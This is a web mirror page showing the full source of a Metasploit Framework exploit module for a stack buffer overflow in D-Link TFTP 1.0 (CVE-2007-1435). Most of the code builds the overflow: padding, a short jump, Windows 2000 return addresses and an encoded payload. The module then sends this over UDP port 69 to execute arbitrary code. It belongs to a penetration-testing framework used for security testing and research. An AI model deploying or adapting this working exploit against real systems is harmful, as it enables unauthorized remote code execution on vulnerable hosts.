CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/tftp/dlink_long_filename.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in D-Link TFTP 1.0.

16
        By sending a request for an overly long file name, an attacker

17
        could overflow a buffer and execute arbitrary code. For best results,

18
        use bind payloads with nonx (No NX).

19
      },

20
      'Author'         =>

21
        [

22
          'LSO <lso[at]hushmail.com>', # Exploit module

23
          'aushack', # Refs, stability, targets etc

24
        ],

25
      'References'     =>

26
        [

27
          [ 'CVE', '2007-1435' ],

28
          [ 'OSVDB', '33977' ],

29
          [ 'BID', '22923' ],

30
        ],

31
      'DefaultOptions' =>

32
        {

33
          'EXITFUNC' => 'process',

34
        },

35
      'Payload'        =>

36
        {

37
          'Space'    => 1024,

38
          'BadChars' => "\x00",

39
          'Compat'   =>

40
          {

41
            'ConnectionType' => '-reverse',

42
          },

43
        },

44
      'SaveRegisters'  => [ 'ecx', 'eax', 'esi' ],

45
      'Platform'       => 'win',

46


47
      'Targets'        =>

48
        [

49
          # Patrick tested OK 20090228

50
          ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx

51
          ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx

52
        ],

53
      'Privileged'     => false,

54
      'DisclosureDate' => '2007-03-12',

55
      'DefaultTarget' => 0))

56


57
    register_options(

58
      [

59
        Opt::RPORT(69)

60
      ], self)

61
  end

62


63
  def exploit

64
    connect_udp

65


66
    print_status("Trying target #{target.name}...")

67


68
    juju = "\x00\x01"

69
    juju << Rex::Text.rand_text_alpha_upper(581)

70
    juju << Rex::Arch::X86.jmp_short(42)

71
    juju << Rex::Text.rand_text_alpha_upper(38)

72
    juju << [target.ret].pack('V') + payload.encoded

73


74
    udp_sock.put(juju)

75


76
    handler

77
    disconnect_udp

78
  end

79
end

80


81